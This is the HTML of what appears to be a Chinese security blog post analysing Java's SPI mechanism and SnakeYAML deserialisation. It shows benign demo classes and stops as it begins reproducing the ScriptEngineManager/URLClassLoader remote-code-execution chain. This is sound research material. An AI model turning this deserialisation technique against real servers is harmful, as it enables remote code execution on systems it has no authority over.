data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;0JYZ-1663655331842&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;tRMK-1663655331840&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;原理分析&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:22}]}]}]}]"><p><span style="font-weight: bold;font-size: 18px;">原理分析</span></p><article><p><br/></p><p><img class="rich_pages wxw-img" data-ratio="0.6805555555555556" style="width: 936px;height: 637px;" data-type="png" data-w="936" src="https://wechat2rss.xlab.app/img-proxy/?k=02438244&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEiaKY1EiawNeO73jO9LtC8Enj4gU67B2wK5a6QjQ0zetdwxFIENlyntAQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;"><span style="color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">跟进</span><span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> ServiceLoad.load(Class</span></span><span style="font-size: 15px;text-decoration: none;"><span style="text-decoration: none;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> service) </span><span style="text-decoration: none;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">方法, 其先创建一个</span><span style="text-decoration: none;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> ClassLoader </span><span style="text-decoration: none;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">，接着继续调用</span><span style="text-decoration: none;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> ServiceLoad.load(Class service, ClassLoader loader) </span><span style="text-decoration: none;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">.</span></span></p><p><span style="text-decoration: line-through;"><img class="rich_pages wxw-img" data-ratio="0.46536144578313254" style="width: 1328px;height: 618px;" data-type="png" data-w="1328" src="https://wechat2rss.xlab.app/img-proxy/?k=1190230f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrE02VjHCcsRNlFFM2YChGoGjxvgm1klXvWy2bL0YKxHwK1zv4ebzK4oQ%2F640%3Fwx_fmt%3Dpng"/></span></p><p><span style="font-size: 15px;text-decoration: none;"><span style="text-decoration: none;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">接着创建一个</span><span style="text-decoration: none;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> ServiceLoader </span><span style="text-decoration: none;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">对象</span></span></p><p><span style="font-size: 15px;text-decoration: none;"><img class="rich_pages wxw-img" data-ratio="0.10935601458080195" style="width: 1646px;height: 180px;" data-type="png" data-w="1646" src="https://wechat2rss.xlab.app/img-proxy/?k=47cf816b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrENSzzBKr9aJhA0DRtNslTic8bVYufqoVYIngzOwu0mDZM43aLnjQf1MA%2F640%3Fwx_fmt%3Dpng"/></span></p><p><span style="font-size: 15px;text-decoration: none;"><span style="text-decoration: none;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">在创建</span><span style="text-decoration: none;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> ServiceLoader </span><span style="text-decoration: none;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">对象时候会调用</span><span style="text-decoration: none;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> reload </span><span style="text-decoration: none;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">方法，在</span><span style="text-decoration: none;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> reload </span><span style="text-decoration: none;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">方法会创建一个</span><span style="text-decoration: none;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> LazyIterator </span><span style="text-decoration: none;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">的实例对象.</span></span></p><p><span style="font-size: 15px;text-decoration: none;"><img class="rich_pages wxw-img" data-ratio="0.3281086729362591" style="width: 957px;height: 314px;" data-type="png" data-w="957" src="https://wechat2rss.xlab.app/img-proxy/?k=8b0eaf5a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEJTRxpMxPiaWggjgluIM2KeicFibACCfAPxBplBGgSFSuF7Bctib6vZIaicQ%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;">在<span style="text-decoration: none;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> LazyIterator </span>对象中有两个参数，分别是:</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;"><span style="text-decoration: none;font-weight: bold;">service</span>: 为要扫描的配置文件名.</span></p></li><li><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;"><span style="text-decoration: none;font-weight: bold;">loader</span>: 为当前线程的<span style="text-decoration: none;background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);"> ClassLoader </span>.</span></p></li></ul><p style="text-align: left;"><img class="rich_pages wxw-img" data-ratio="0.1941747572815534" style="font-size: 15px;letter-spacing: 0.034em;width: 618px;height: 120px;" data-type="png" data-w="618" src="https://wechat2rss.xlab.app/img-proxy/?k=c954a48c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEm2E7T7wic2OsEmlh48t9uwKHb67YH7nFGO87Cnl9YQYqWA2IhicibJTkw%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="font-size: 15px;"><span style="text-decoration: none;">返回一个<span style="text-decoration: none;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> LazyIterator </span>的实例，如其名字一样，这是一个延迟加载的迭代器，然后返回到主函数我们进行迭代。</span><span style="letter-spacing: 0.034em;"> </span></span></p><p style="text-align: left;"><img class="rich_pages wxw-img" data-ratio="0.23946629213483145" style="font-size: 15px;letter-spacing: 0.034em;width: 1424px;height: 341px;" data-type="png" data-w="1424" src="https://wechat2rss.xlab.app/img-proxy/?k=72b0808c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEGZlSd73WWv2iaPy4sRbAlwn09rEduxkaO8y01sbelh9VQGdibMPQ8oEA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;">在遍历对象前我们会先通过<span style="text-decoration: none;background-color: rgb(253, 238, 238);color: rgb(255, 0, 1);">hasNext</span>方法判断是否存在</span><span style="font-size: 15px;letter-spacing: 0.034em;">  </span><img class="rich_pages wxw-img" data-ratio="0.16381156316916487" style="font-size: 15px;letter-spacing: 0.034em;width: 934px;height: 153px;" data-type="png" data-w="934" src="https://wechat2rss.xlab.app/img-proxy/?k=38ea8a35&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrERupEJ1BH5U3GZLUmY7h1sP8iaq2nYWXGG7mviacic1Ey4FuJd3Rs9GjJw%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;">跟入<span style="text-decoration: none;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">java.util.ServiceLoader.LazyIterator#hasNext</span>方法</span><span style="font-size: 15px;letter-spacing: 0.034em;">  </span><img class="rich_pages wxw-img" data-ratio="0.3472222222222222" style="font-size: 15px;letter-spacing: 0.034em;width: 792px;height: 275px;" data-type="png" data-w="792" src="https://wechat2rss.xlab.app/img-proxy/?k=5aa32fa6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEicW1DXHqPf9sic04RVASGnk2Msnias5WPLMhibLFP8icKr3w1bNHpHwvKCA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;"><img class="rich_pages wxw-img" data-ratio="0.49330357142857145" style="width: 1344px;height: 663px;" data-type="png" data-w="1344" src="https://wechat2rss.xlab.app/img-proxy/?k=a82e47e1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEeibdbqYRejvaCrx5zRorTQIcHMAnDo408Wn0wLTxV6ibqia8ibKeF8309Q%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;">这里的<span style="text-decoration: none;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">java.util.ServiceLoader#parse</span>方法完成服务提供者的解析</span></p><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;"><img class="rich_pages wxw-img" data-ratio="0.39901477832512317" style="width: 1624px;height: 648px;" data-type="png" data-w="1624" src="https://wechat2rss.xlab.app/img-proxy/?k=46d5f065&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEtwmcficibISAia3t6K3cHzSlpkMQhiaGKDtjUH3v6SIbia4f0feCdSrWx8Q%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;"><img class="rich_pages wxw-img" data-ratio="0.4352806414662085" style="width: 1746px;height: 760px;" data-type="png" data-w="1746" src="https://wechat2rss.xlab.app/img-proxy/?k=a835173b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrE3QB7qy2wnz7XwFybgtVKichScHybGR4F3mg7ye4VmdJ08sCVhuvlKbw%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;">可以看到实际上就是解析每行获得的服务提供者。</span></p><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;">下面我们看一下实际调用时候的流程</span><span style="font-size: 15px;letter-spacing: 0.034em;">   </span><img class="rich_pages wxw-img" data-ratio="0.17746478873239438" style="font-size: 15px;letter-spacing: 0.034em;width: 1420px;height: 252px;" data-type="png" data-w="1420" src="https://wechat2rss.xlab.app/img-proxy/?k=6293dd5f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEY7x8Jla2W4fLBSkb2K21g4l0tDicDTAX6LHQlvALmt8f2CjTrPZnkzw%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;"><img class="rich_pages wxw-img" data-ratio="0.6648983200707339" style="width: 1131px;height: 752px;" data-type="png" data-w="1131" src="https://wechat2rss.xlab.app/img-proxy/?k=640d78c0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEWNcvEIQT5XYWVbLial8gpjU8FyWUmmfDXTKTLpsNZcJxLo9aC6BvNBg%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align: left;"><span style="font-size: 15px;text-decoration: none;">其实就是读取<span style="text-decoration: none;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> META-INF/services/包名.接口名 </span>文件，然后遍历文件中每一个实现了服务接口的服务提供者类名，通过反射创建实例对象，并存到服务提供者列表里面。</span><span style="font-size: 15px;letter-spacing: 0.034em;">流程下来我们知道了如果</span><span style="font-size: 15px;letter-spacing: 0.034em;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> load </span><span style="font-size: 15px;letter-spacing: 0.034em;">可控加载恶意的接口实现类。然后控制</span><span style="font-size: 15px;letter-spacing: 0.034em;background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);"> Jar </span><span style="font-size: 15px;letter-spacing: 0.034em;">包中的</span><span style="font-size: 15px;letter-spacing: 0.034em;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> META-INF/services </span><span style="font-size: 15px;letter-spacing: 0.034em;">目录中的</span><span style="font-size: 15px;letter-spacing: 0.034em;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">SPI</span><span style="font-size: 15px;letter-spacing: 0.034em;">配置文件，我们就可以服务器通过</span><span style="font-size: 15px;letter-spacing: 0.034em;background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">SPI</span><span style="font-size: 15px;letter-spacing: 0.034em;">机制调用恶意类达到恶意代码执行的效果。</span></p><p><span style="text-decoration: line-through;font-size: 15px;"><br/></span></p><p><span style="font-weight: bold;font-size: 20px;text-decoration: none;">RCE Demo</span></p><p style="text-align: left;"><span style="text-decoration: none;font-size: 15px;">如果服务提供者的接口中存在RCE，则我们跌倒调用的时候会导致RCE触发。</span></p><p><span style="text-decoration: line-through;"><img class="rich_pages wxw-img" data-ratio="0.2507716049382716" style="width: 1296px;height: 325px;" data-type="png" data-w="1296" src="https://wechat2rss.xlab.app/img-proxy/?k=e11cecc3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEJdWp4yK6ORendwQfQnaAVwibvZTMzIg4qWhlqRWrmibr6rIX5AS82rRw%2F640%3Fwx_fmt%3Dpng"/></span></p><p><span style="text-decoration: line-through;"><img class="rich_pages wxw-img" data-ratio="0.46494464944649444" style="width: 1294px;height: 602px;" data-type="png" data-w="1626" src="https://wechat2rss.xlab.app/img-proxy/?k=5170f9f9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEB6jZOulv2SI9vPXKiaE0YWaGcgiaq1yl1JnFib1wDRQUgaA7tLHcl3x5w%2F640%3Fwx_fmt%3Dpng"/></span></p></article></article><p><br/></p><p><br/></p></article><p><br/></p><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;fRAW-1677934496821&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h1&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;3SLv-1677934496819&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;Snakeyaml的反序列化方式&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;bb3Z-1677934501293&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;RMTD-1677934501294&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;无构造函数和set函数情况下&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;snakeyaml&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;将使用反射的方式自动赋值。&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;NkvA-1677934510287&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;4yTm-1677934510286&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;声明如下类A&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 20px;">Snakeyaml的反序列化方式</span></p><p><span style="font-size: 18px;font-weight: 700;letter-spacing: 0.578px;text-wrap: wrap;">无构造<span style="font-size: 18px;font-weight: 700;letter-spacing: 0.578px;text-wrap: wrap;">方法</span>和setter方法</span></p><p><span style="font-size: 15px;"><span style="font-weight: bold;">无构造<span style="font-size: 15px;font-weight: 700;letter-spacing: 0.578px;text-wrap: wrap;">方法</span>和setter<span style="font-size: 15px;font-weight: 700;letter-spacing: 0.578px;text-wrap: wrap;">方法</span>情况下</span><span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);font-weight: bold;">snakeyaml</span><span style="font-weight: bold;">将使用反射的方式自动赋值。</span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="java"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">package</span> com.SnakeYamlSec;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__class"><span class="code-snippet__keyword">class</span> <span class="code-snippet__title">ModelA</span> </span>{</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">int</span>  a;</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">int</span> b;</span></code><code><span class="code-snippet_outer">}</span></code></pre></section></article><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;dCoO-1677934510305&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;DITQ-1677934510304&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;使用如下方法反序列化&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;">使用如下方法反序列化</span></p></article></article><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cs"><code><span class="code-snippet_outer">Yaml yaml = <span class="code-snippet__keyword">new</span> Yaml();</span></code><code><span class="code-snippet_outer">ModelA a = (ModelA) yaml.load(<span class="code-snippet__string">&#34;!!com.SnakeYamlSec.ModelA {a: 5, b: 0}&#34;</span>) ;</span></code><code><span class="code-snippet_outer">System.<span class="code-snippet__keyword">out</span>.println(yaml.dump(a));</span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;IXpC-1677934510316&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;em31-1677934510315&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;将反序列化成功。&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;">将反序列化成功。</span></p></article><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;oRxw-1677934510318&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;VHCd-1677934510317&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;构造函数&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;nGLS-1677934510320&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;agCk-1677934510319&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;声明如下类B&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 18px;">存在构造方法</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cs"><code><span class="code-snippet_outer">package com.SnakeYamlSec;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">class</span> <span class="code-snippet__title">ModelB</span> {</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">int</span> a;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">int</span> b;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__title">ModelB</span>(<span class="code-snippet__params"><span class="code-snippet__keyword">int</span> a,<span class="code-snippet__keyword">int</span> b</span>)</span>{</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">this</span>.a = a;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">this</span>.b = b;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">}</span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;NEYa-1677934510345&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;k8FS-1677934510344&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;使用如下方式反序列化&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;">使用如下方式反序列化</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li></ul><pre class="code-snippet__js" data-lang="swift"><code><span class="code-snippet_outer">ModelB b = (ModelB) yaml.load(&#34;!!com.SnakeYamlSec.ModelB [5 , 0 ]&#34;) ;</span></code><code><span class="code-snippet_outer">System.out.println(yaml.dump(b));</span></code></pre></section><p><span style="font-size: 15px;">这里的<span style="letter-spacing: 0.034em;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">[ ]</span><span style="letter-spacing: 0.034em;">是调用构造函数的一个标志，在构造函数中下断点，也能够成功调到。</span></span></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;tiTV-1677934510359&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;sEEx-1677934510358&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;需要注意&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34; snakeyaml &#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;反序列化时，如果类中的成员变量全为私有将会失败（调试得知）。&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;">需要注意<span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);"> snakeyaml </span>反序列化时，如果类中的成员变量全为私有将会失败（调试得知）。</span></p><p><span style="font-size: 15px;"><br/></span></p></article><p><span style="font-weight: bold;letter-spacing: 0.034em;font-size: 18px;">存在setter方法</span><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;5BuB-1677934510361&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;ls2b-1677934510360&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;调用setXX函数&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;HNEE-1677934510363&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;VpzJ-1677934510362&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;这个是最关键的部分，声明如下类C&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="java"><code><span class="code-snippet_outer">package com.SnakeYamlSec;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">public class ModelC {</span></code><code><span class="code-snippet_outer">    public int a;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    public void setInput(int a){</span></code><code><span class="code-snippet_outer">        this.a = a;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">}</span></code></pre></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li></ul><pre class="code-snippet__js" data-lang="swift"><code><span class="code-snippet_outer">ModelC c = (ModelC) yaml.load(&#34;!!com.zlg.SnakeYaml.ModelC {input : 5}&#34;) ;</span></code><code><span class="code-snippet_outer">System.out.println(yaml.dump(c));</span></code></pre></section></article><p><span style="font-size: 15px;">使用此方式在反序列化过程中会<span style="letter-spacing: 0.034em;">调用</span><span style="letter-spacing: 0.034em;background-color: rgb(253, 238, 238);color: rgb(255, 0, 1);">setter</span><span style="letter-spacing: 0.034em;">方法，其YAML写法和无构造函数的方式写法差不多，比如要调用</span><span style="letter-spacing: 0.034em;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">setInput</span><span style="letter-spacing: 0.034em;">函数，把</span><span style="letter-spacing: 0.034em;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">set</span><span style="letter-spacing: 0.034em;">去掉将后面单词全部小写后，后面值就是传入</span><span style="letter-spacing: 0.034em;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">setInput</span><span style="letter-spacing: 0.034em;">的参数就可以调用，其实Java中很多组件中都会存在类似操作，即判断目标类的相关属性是否存在<span style="letter-spacing: 0.034em;text-wrap: wrap;background-color: rgb(253, 238, 238);color: rgb(255, 0, 1);">setter</span><span style="letter-spacing: 0.034em;text-wrap: wrap;">方法</span>，如果存在优先考虑使用<span style="letter-spacing: 0.034em;text-wrap: wrap;background-color: rgb(253, 238, 238);color: rgb(255, 0, 1);">setter</span><span style="letter-spacing: 0.034em;text-wrap: wrap;">方法</span>。</span></span></p><article><p><span style="font-size: 15px;">到此为止，意味着<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">snakeyaml</span>可以利用<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">fastjson</span>和<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">Jackson</span>的所有利用链（反之不一定行），并且还没有<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">autotype</span>的限制。</span></p></article><p><br/></p><p><br/></p></article><p><br/></p><article><p><span style="font-weight: bold;font-size: 20px;">ScriptEngineManager反序列化利用</span></p><p><span style="font-weight: bold;font-size: 18px;">攻击复现</span></p><p><span style="font-size: 15px;">网上最多的一个<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">PoC</span>就是基于<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">javax.script.ScriptEngineManager</span>的利用链通过<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">URLClassLoader</span>实现的代码执行。</span><span style="text-decoration: underline;color: rgb(3, 102, 214);font-size: 15px;">Github</span><span style="font-size: 15px;">上已经有现成的利用项目，可以更改好项目代码部署在<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">web</span>上即可。所以说<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">SnakeYaml</span>通常的一个利用条件是需要出网的。</span><span style="font-size: 15px;letter-spacing: 0.034em;">该项目中执行的命令在Windows下不适用，</span><span style="font-size: 15px;letter-spacing: 0.034em;">我们需要进行需</span><span style="font-size: 15px;letter-spacing: 0.034em;">改，比如加一段弹计算器的代码</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4568452380952381" data-s="300,640" style="" data-type="png" data-w="1344" 